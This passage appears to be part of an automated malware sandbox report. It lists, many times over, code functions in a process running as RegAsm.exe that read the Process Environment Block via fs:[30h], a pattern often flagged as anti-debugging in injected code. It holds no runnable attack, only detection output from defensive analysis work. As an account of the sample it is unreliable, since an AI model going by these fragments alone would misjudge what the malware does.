Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C77330 mov eax, dword ptr fs:[00000030h]	3_2_02C77330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D mov eax, dword ptr fs:[00000030h]	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D mov eax, dword ptr fs:[00000030h]	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D550D9 mov eax, dword ptr fs:[00000030h]	3_2_02D550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D020DE mov eax, dword ptr fs:[00000030h]	3_2_02D020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD0C0 mov eax, dword ptr fs:[00000030h]	3_2_02CFD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD0C0 mov eax, dword ptr fs:[00000030h]	3_2_02CFD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA90DB mov eax, dword ptr fs:[00000030h]	3_2_02CA90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C880E9 mov eax, dword ptr fs:[00000030h]	3_2_02C880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_02C7A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA50E4 mov eax, dword ptr fs:[00000030h]	3_2_02CA50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA50E4 mov ecx, dword ptr fs:[00000030h]	3_2_02CA50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C0F0 mov eax, dword ptr fs:[00000030h]	3_2_02C7C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC20F0 mov ecx, dword ptr fs:[00000030h]	3_2_02CC20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8208A mov eax, dword ptr fs:[00000030h]	3_2_02C8208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D08D mov eax, dword ptr fs:[00000030h]	3_2_02C7D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB909C mov eax, dword ptr fs:[00000030h]	3_2_02CB909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD090 mov eax, dword ptr fs:[00000030h]	3_2_02CAD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD090 mov eax, dword ptr fs:[00000030h]	3_2_02CAD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85096 mov eax, dword ptr fs:[00000030h]	3_2_02C85096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D460B8 mov eax, dword ptr fs:[00000030h]	3_2_02D460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D460B8 mov ecx, dword ptr fs:[00000030h]	3_2_02D460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2705E mov ebx, dword ptr fs:[00000030h]	3_2_02D2705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2705E mov eax, dword ptr fs:[00000030h]	3_2_02D2705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C82050 mov eax, dword ptr fs:[00000030h]	3_2_02C82050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB052 mov eax, dword ptr fs:[00000030h]	3_2_02CAB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55060 mov eax, dword ptr fs:[00000030h]	3_2_02D55060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov ecx, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAC073 mov eax, dword ptr fs:[00000030h]	3_2_02CAC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD070 mov ecx, dword ptr fs:[00000030h]	3_2_02CFD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A020 mov eax, dword ptr fs:[00000030h]	3_2_02C7A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C020 mov eax, dword ptr fs:[00000030h]	3_2_02C7C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D461C3 mov eax, dword ptr fs:[00000030h]	3_2_02D461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D461C3 mov eax, dword ptr fs:[00000030h]	3_2_02D461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBD1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CBD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBD1D0 mov ecx, dword ptr fs:[00000030h]	3_2_02CBD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D551CB mov eax, dword ptr fs:[00000030h]	3_2_02D551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C851ED mov eax, dword ptr fs:[00000030h]	3_2_02C851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D561E5 mov eax, dword ptr fs:[00000030h]	3_2_02D561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB01F8 mov eax, dword ptr fs:[00000030h]	3_2_02CB01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC0185 mov eax, dword ptr fs:[00000030h]	3_2_02CC0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C188 mov eax, dword ptr fs:[00000030h]	3_2_02D3C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C188 mov eax, dword ptr fs:[00000030h]	3_2_02D3C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD7190 mov eax, dword ptr fs:[00000030h]	3_2_02CD7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9B1B0 mov eax, dword ptr fs:[00000030h]	3_2_02C9B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55152 mov eax, dword ptr fs:[00000030h]	3_2_02D55152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C156 mov eax, dword ptr fs:[00000030h]	3_2_02C7C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov ecx, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87152 mov eax, dword ptr fs:[00000030h]	3_2_02C87152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86154 mov eax, dword ptr fs:[00000030h]	3_2_02C86154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86154 mov eax, dword ptr fs:[00000030h]	3_2_02C86154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D19179 mov eax, dword ptr fs:[00000030h]	3_2_02D19179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D40115 mov eax, dword ptr fs:[00000030h]	3_2_02D40115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov ecx, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0124 mov eax, dword ptr fs:[00000030h]	3_2_02CB0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81131 mov eax, dword ptr fs:[00000030h]	3_2_02C81131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81131 mov eax, dword ptr fs:[00000030h]	3_2_02C81131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB16CF mov eax, dword ptr fs:[00000030h]	3_2_02CB16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA6C7 mov ebx, dword ptr fs:[00000030h]	3_2_02CBA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA6C7 mov eax, dword ptr fs:[00000030h]	3_2_02CBA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F6C7 mov eax, dword ptr fs:[00000030h]	3_2_02D3F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D006F1 mov eax, dword ptr fs:[00000030h]	3_2_02D006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D006F1 mov eax, dword ptr fs:[00000030h]	3_2_02D006F1
